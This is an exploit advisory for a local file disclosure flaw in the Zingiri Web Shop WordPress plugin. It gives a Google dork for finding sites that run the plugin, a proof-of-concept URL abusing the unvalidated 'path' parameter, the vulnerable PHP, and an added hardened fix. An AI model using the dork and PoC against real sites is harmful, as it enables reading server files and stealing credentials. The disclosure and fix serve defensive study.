WordPress Zingiri Web Shop plugin local file disclosure (LFD)



EKU-ID: 1885 CVE: OSVDB-ID:
Author: Tunisian spl01t3r Published: 2012-04-10 Verified: Verified


+----------------------------------------------------------------------+
# Exploit Title: WordPress Zingiri Web Shop plugin local file disclosure (LFD)
# Google Dork: inurl:wp-content/plugins/zingiri-web-shop
# Date: 08/04/2012
# Author: Tunisian spl01t3r
# Greetz: Milw0rm 1337day.com
# Software Link: http://wordpress.org/extend/plugins/zingiri-web-shop/download/
# Version: zingiri-web-shop.2.2.0

+----------------------------------------------------------------------+
[+] p0c : http://[SERVER]/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax-preview.php?path= [lfd]

[+] vulnerable code : 
// ajax-preview.php: the 'path' request parameter reaches fopen() with no validation
if(($fp = @fopen($_GET['path'], 'r'))) {
    echo fread($fp, @filesize($_GET['path']));
    @fclose($fp);
}
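
A hardened form of the read above, as an added example (not code from the advisory or from the plugin): the parameter is canonicalised with realpath() and served only if it stays inside one directory and has a preview-able extension. PREVIEW_ROOT, its path, the extension list and resolve_preview_path() are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's code. PREVIEW_ROOT and
// resolve_preview_path() are hypothetical names; the root path is assumed.
const PREVIEW_ROOT = '/var/www/html/wp-content/uploads';

// Return the canonical path when $requested names a regular file inside
// $root with an allowed extension; return null for everything else.
function resolve_preview_path(string $requested, string $root): ?string
{
    // PHP 8 file functions throw on NUL bytes, so reject them up front.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    // Always resolve relative to the root, so absolute paths and stream
    // wrappers in the parameter cannot select another location, then
    // canonicalise so "../" sequences and symlinks are resolved.
    $candidate = $rootReal . DIRECTORY_SEPARATOR . ltrim($requested, '/\\');
    $real = realpath($candidate);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Compare against the root plus a trailing separator, so a sibling
    // such as "uploads-old" does not pass as being inside "uploads".
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Serve only preview-able types, never PHP source or config files.
    $allowed = ['jpg', 'jpeg', 'png', 'gif', 'txt'];
    $ext = strtolower(pathinfo($real, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true) ? $real : null;
}

// ?path[]=x arrives as an array, so require a string before resolving.
$raw  = $_GET['path'] ?? '';
$path = is_string($raw) ? resolve_preview_path($raw, PREVIEW_ROOT) : null;
if ($path === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
readfile($path);
```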
+----------------------------------------------------------------------+
[+] greetz to : BIbou sfaxien ; mech lazem ;tn_scorpion ; anas laaribi ;
       jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
  
                      mAhna mAhna
  
[+] profile :  www.facebook.com/TN.spl0it3r   

+----------------------------------------------------------------------+